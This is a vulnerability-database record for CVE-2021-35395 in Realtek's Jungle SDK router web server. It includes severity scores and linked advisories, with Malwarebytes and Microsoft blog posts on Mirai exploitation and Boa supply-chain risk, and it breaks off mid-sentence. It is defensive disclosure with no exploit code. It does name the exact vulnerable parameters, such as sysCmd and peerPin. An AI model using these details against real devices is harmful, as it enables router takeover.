Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.
{"id": "CVE-2021-35395", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-35395", "description": "Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: - stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter - stack buffer overflow in formWsc due to unsafe copy of submit-url parameter - stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter - stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter - stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter - stack buffer overflow in formWsc due to unsafe copy of 'peerPin' parameter - arbitrary command execution in formSysCmd via the sysCmd parameter - arbitrary command injection in formWsc via the 'peerPin' parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.", "published": "2021-08-16T12:15:00", "modified": "2021-08-26T14:27:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35395", "reporter": "cve@mitre.org", "references": ["https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en", "https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain", "https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf"], "cvelist": ["CVE-2021-35395"], "immutableFields": [], "lastseen": "2022-03-23T18:48:58", "viewCount": 464, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0538"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "thn", "idList": ["THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1"]}, {"type": "threatpost", "idList": ["THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA"]}], "rev": 4}, "score": {"value": 2.1, "vector": "NONE"}, "twitter": {"counter": 22, "modified": "2021-08-17T07:54:24", "tweets": [{"link": "https://twitter.com/CyberSecDN/status/1430145807689437242", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) - https://t.co/JdSWLmYNRN?amp=1 /hashtag/cybersecurity?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/hintz2010/status/1430534974487384068", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) /hashtag/cybersecurity?src=hashtag_click /hashtag/awareness?src=hashtag_click /hashtag/vulnerability?src=hashtag_click"}, {"link": "https://twitter.com/kuriharan/status/1430534176344793096", "text": "Learn it. Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) https://t.co/ZjU6IknlNp?amp=1 /hashtag/tech?src=hashtag_click /hashtag/digital?src=hashtag_click /hashtag/data?src=hashtag_click /hashtag/security?src=hashtag_click"}, {"link": "https://twitter.com/UtopianKnightUK/status/1430152571616890883", "text": "... to exploit CVE-2021-35395, a group of vulnerabilities in the web interface of the Realtek SDK, to spread Mirai malware to vulnerable IoT devices. /hashtag/cybernews?src=hashtag_click /hashtag/thecybernewsfeed?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1430245535064236043", "text": "(Same from about 4 hours ago.)\nI think that the most retweeted(39 times) tweet that contains CVE ID between Aug 23 2021 19:01 UTC and Aug 24 2021 19:00 UTC is:\n/bad_packets/status/1430013950364585991\nIt has CVE-2021-35395. /hashtag/l24_iflwhkp3yv5om?src=hashtag_click"}, {"link": "https://twitter.com/ipssignatures/status/1430185136973402125", "text": "(second \u2192 most)\nI think that the most retweeted(33 times) tweet that contains CVE ID between Aug 23 2021 15:01 UTC and Aug 24 2021 15:00 UTC is:\n/bad_packets/status/1430013950364585991\nIt has CVE-2021-35395. /hashtag/l24_iflwhkp3yv5om?src=hashtag_click"}, {"link": "https://twitter.com/cyberreport_io/status/1430153556779094026", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) - Help Net Security https://t.co/o2kjX0k1tC?amp=1 /hashtag/cybersecurity?src=hashtag_click /hashtag/threatintelligence?src=hashtag_click /hashtag/cybernews?src=hashtag_click"}, {"link": "https://twitter.com/BishwarupamSaha/status/1430149367567060995", "text": "New variant of /hashtag/Mirai?src=hashtag_click Botnet targeting thousands of IoT devices by abusing /hashtag/Realtek?src=hashtag_click SDK /hashtag/vulnerability?src=hashtag_click tracked as CVE-2021-35395\n/hashtag/router?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/IoT?src=hashtag_click /hashtag/botnet?src=hashtag_click /hashtag/infosec?src=hashtag_click /hashtag/threatIntel?src=hashtag_click"}, {"link": "https://twitter.com/SouthSeasData/status/1430184283914842113", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395) https://t.co/1tutAQnAKd?amp=1\n/hashtag/IoTSecurity?src=hashtag_click /hashtag/Realtek?src=hashtag_click /hashtag/vulnerability?src=hashtag_click /hashtag/Mirai?src=hashtag_click /hashtag/malware?src=hashtag_click /hashtag/botnet?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/CVE?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/infosec?src=hashtag_click"}, {"link": "https://twitter.com/Security_411/status/1430186646079561736", "text": "Realtek SDK vulnerability exploitation attempts detected (CVE-2021-35395)"}]}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C"]}], "wildExploited": true}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0538"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "thn", "idList": ["THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1"]}, {"type": "threatpost", "idList": ["THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA"]}]}, "affected_software": {"major_version": [{"name": "realtek realtek jungle sdk", "version": 3}]}, "vulnersScore": 2.1}, "_state": {"wildexploited": 0, "dependencies": 1659911869, "score": 1659847081, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671597168}, "_internal": {"score_hash": "01fd37a1e21d84469140d888a1df6475"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:realtek:realtek_jungle_sdk:3.4.14b"], "cpe23": ["cpe:2.3:a:realtek:realtek_jungle_sdk:3.4.14b:*:*:*:*:*:*:*"], "cwe": ["CWE-77", "CWE-787"], "affectedSoftware": [{"cpeName": "realtek:realtek_jungle_sdk", "version": "3.4.14b", "operator": "le", "name": "realtek realtek jungle sdk"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:realtek:realtek_jungle_sdk:3.4.14b:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndIncluding": "3.4.14b", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en", "name": "https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain", "name": "https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf", "name": "https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf", "refsource": "MISC", "tags": ["Patch"]}]}
{"cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Realtek Jungle SDK version v2.x up to v3.4.14B arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Realtek SDK Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35395"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-35395", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-12-29T08:11:18", "description": "Realtek Jungle SDK version v2.x up to v3.4.14B provides an HTTP web server exposing a management interface that can be used to configure the access point. Two versions of this management interface exists: one based on Go-Ahead named webs and another based on Boa named boa. Both of them are affected by these vulnerabilities. Specifically, these binaries are vulnerable to the following issues: \u2013 stack buffer overflow in formRebootCheck due to unsafe copy of submit-url parameter \u2013 stack buffer overflow in formWsc due to unsafe copy of submit-url parameter \u2013 stack buffer overflow in formWlanMultipleAP due to unsafe copy of submit-url parameter \u2013 stack buffer overflow in formWlSiteSurvey due to unsafe copy of ifname parameter \u2013 stack buffer overflow in formStaticDHCP due to unsafe copy of hostname parameter \u2013 stack buffer overflow in formWsc due to unsafe copy of \u2018peerPin\u2019 parameter \u2013 arbitrary command execution in formSysCmd via the sysCmd parameter \u2013 arbitrary command injection in formWsc via the \u2018peerPin\u2019 parameter Exploitability of identified issues will differ based on what the end vendor/manufacturer did with the Realtek SDK webserver. Some vendors use it as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK webserver will probably contains its own set of issues on top of the Realtek ones (if kept). Successful exploitation of these issues allows remote attackers to gain arbitrary code execution on the device.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-35395", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-27T00:00:00", "id": "AKB:1C877D41-AB57-45E1-A0E5-2FE1E723EB0C", "href": "https://attackerkb.com/topics/BdNM7QKhjo/cve-2021-35395", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:00", "description": "A buffer overflow vulnerability exists in Realtek Jungle SDK. Successful exploitation of this vulnerability could result in a denial of service or execution of arbitrary code into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "checkpoint_advisories", "title": "Realtek Jungle SDK Buffer Overflow (CVE-2021-35392; CVE-2021-35393; CVE-2021-35395)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35392", "CVE-2021-35393", "CVE-2021-35395"], "modified": "2021-08-31T00:00:00", "id": "CPAI-2021-0538", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-08-27T12:34:55", "description": "A few weeks ago we blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of a management interfaces that can accessed over the Internet. Both of them are vulnerable to multiple stack buffer overflows due to "unsafe" copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces are failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under CVE-2021-20090 which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealTek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. Alongside its list, Mainstream Technologies warns that: "If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch".\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819D chipset is vulnerable and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nIt is cases like these that could end up to be a deciding factor in the discussion whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T13:36:52", "type": "malwarebytes", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-24T13:36:52", "id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-12-08T23:24:29", "description": "> **December 8, 2022 update** - Reflected additional research on Boa-related CVEs and updated supply chain diagram.\n\nVulnerabilities in network components, architecture files, and developer tools have become increasingly popular attack vectors to gain access into secure networks and devices. External tools and products that are managed by vendors and developers can pose a security risk, especially to targets in sensitive industries. Attacks on software and hardware supply chains, like [Log4J](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) and [SolarWinds](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>), have highlighted the importance of visibility across device components and proactively securing networks. A [report](<https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets?__hstc=156209188.65c2d309abc7befc704e210a65154bf8.1666196607997.1666196607997.1666196607997.1&__hssc=156209188.1.1666196607998&__hsfp=2445685111>) published by Recorded Future in April 2022 detailed suspected electrical grid intrusion activity and implicated common IoT devices as the vector used to gain a foothold into operational technology (OT) networks and deploy malicious payloads. While investigating the attack activity, Microsoft researchers identified a vulnerable component on all the IP addresses published as IOCs and found evidence of a supply chain risk that may affect millions of organizations and devices.\n\nWe assessed the vulnerable component to be the Boa web server, which is often used to access settings and management consoles and sign-in screens in devices. Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs). Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files. Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.\n\nIn this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries. We also discuss the difficulties with identifying these components in device supply chains. To provide comprehensive protection against such attacks, we offer detection information to identify vulnerable components and guidance for organizations and network operators to improve their security posture.\n\n## Investigating the attack activity\n\nThe attack detailed in the Recorded Future report was one of several intrusion attempts on Indian critical infrastructure since 2020, with the [most recent attack](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>) on IT assets confirmed in October 2022. Microsoft assesses that Boa servers were running on the IP addresses on the list of IOCs published by Recorded Future at the time of the report\u2019s release and that the electrical grid attack targeted exposed IoT devices running Boa.\n\nMicrosoft further identified that half of the IP addresses published by Recorded Future returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool identified by Recorded Future. The combination of Boa and suspicious response headers was identified on another set of IP addresses, displaying similar behavior to those found by Recorded Future. While these IP addresses are not confirmed as malicious, we recommend they be monitored to ensure no additional suspicious activity. Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious:\n\n * 122[.]117[.]212[.]65\n * 103[.]58[.]93[.]133\n * 125[.]141[.]38[.]53\n * 14[.]45[.]33[.]239\n * 14[.]55[.]86[.]138\n * 183[.]108[.]133[.]29\n * 183[.]99[.]53[.]180\n * 220[.]94[.]133[.]121\n * 58[.]76[.]177[.]166\n\nInvestigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated to IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. Most of the suspicious HTTP response headers were returned over a short timeframe of several days, leading researchers to believe they may be associated with intrusion and malicious activity on networks.\n\nSince the report\u2019s publication, Microsoft researchers tracking the published IPs hosts have observed that all IP addresses have been compromised by a variety of attackers employing different malicious methods. For example, some of the IP addresses were further leveraged to download a variant of the Mirai malware family shortly following the report's release. Microsoft also found evidence that across different devices on the IP addresses, there were attempts to connect with default credentials through brute force methods and attempts to run shell commands. Microsoft continues to see attackers attempting to exploit Boa vulnerabilities beyond the timeframe of the released report, indicating that it is still targeted as an attack vector.\n\n## Boa widespread through SDKs\n\nThe Boa web server is widely implemented across a variety of devices, including IoT devices ranging from routers to cameras, and is often used to access settings and management consoles as well as sign-in screens. The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005. Data from the Microsoft Defender Threat Intelligence platform identified over 1 million internet-exposed Boa server components around the world over the span of a week, as depicted in the below figure:\n\nFigure 1. Global mapping of internet-exposed Boa web servers on devices\n\nBoa web servers remain pervasive in the development of IoT devices, one reason for this could be its inclusion in popular SDKs, which contain essential functions that operate system on chip (SOC) implemented in microchips. Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to [supply chain vulnerabilities](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>). Popular SDKs like those released by RealTek, are used in SOCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. Critical vulnerabilities such as [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>), which affected the digital administration of devices using RealTek\u2019s SDK, and [CVE-2022-27255](<https://nvd.nist.gov/vuln/detail/CVE-2022-27255>), a zero-click overflow vulnerability, [reportedly affect millions of devices](<https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/>) globally and allow attackers to launch code, compromise devices, [deploy botnets](<https://www.bleepingcomputer.com/news/security/botnet-targets-hundreds-of-thousands-of-devices-using-realtek-sdk/?fbclid=IwAR1Bp2n0EXpD01pNGfs7T24Rdc2HeCPrN4za5Pj21CXFNPgOFFG-I_ZMXtg>), and move laterally on networks.\n\nWhile patches for the RealTek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities. Boa servers are affected by several known vulnerabilities, including CVE-2009-4496, which could allow attackers to execute code remotely. Additional vendor and device specific vulnerabilities exist across a range of devices including routers.\n\nFigure 2. The IoT device supply chain demonstrates how vulnerabilities are distributed downstream to organizations and their assets\n\nThe popularity of the Boa web server displays the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network. Updating the firmware of IoT devices does not always patch SDKs or specific SOC components and there is limited visibility into components and whether they can be updated. The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials. In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.\n\n## Recommendations\n\nAs attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations. This case displays the importance of proactive cyber security practices and the need to identify vulnerable components that may be leveraged by attackers.\n\nMicrosoft recommends that organizations and network operators follow best practice guidelines for their networks:\n\n * **Patch vulnerable devices whenever possible** to reduce exposure risks across your organization.\n * **Utilize device discovery and classification** to identify devices with vulnerable components by enabling vulnerability 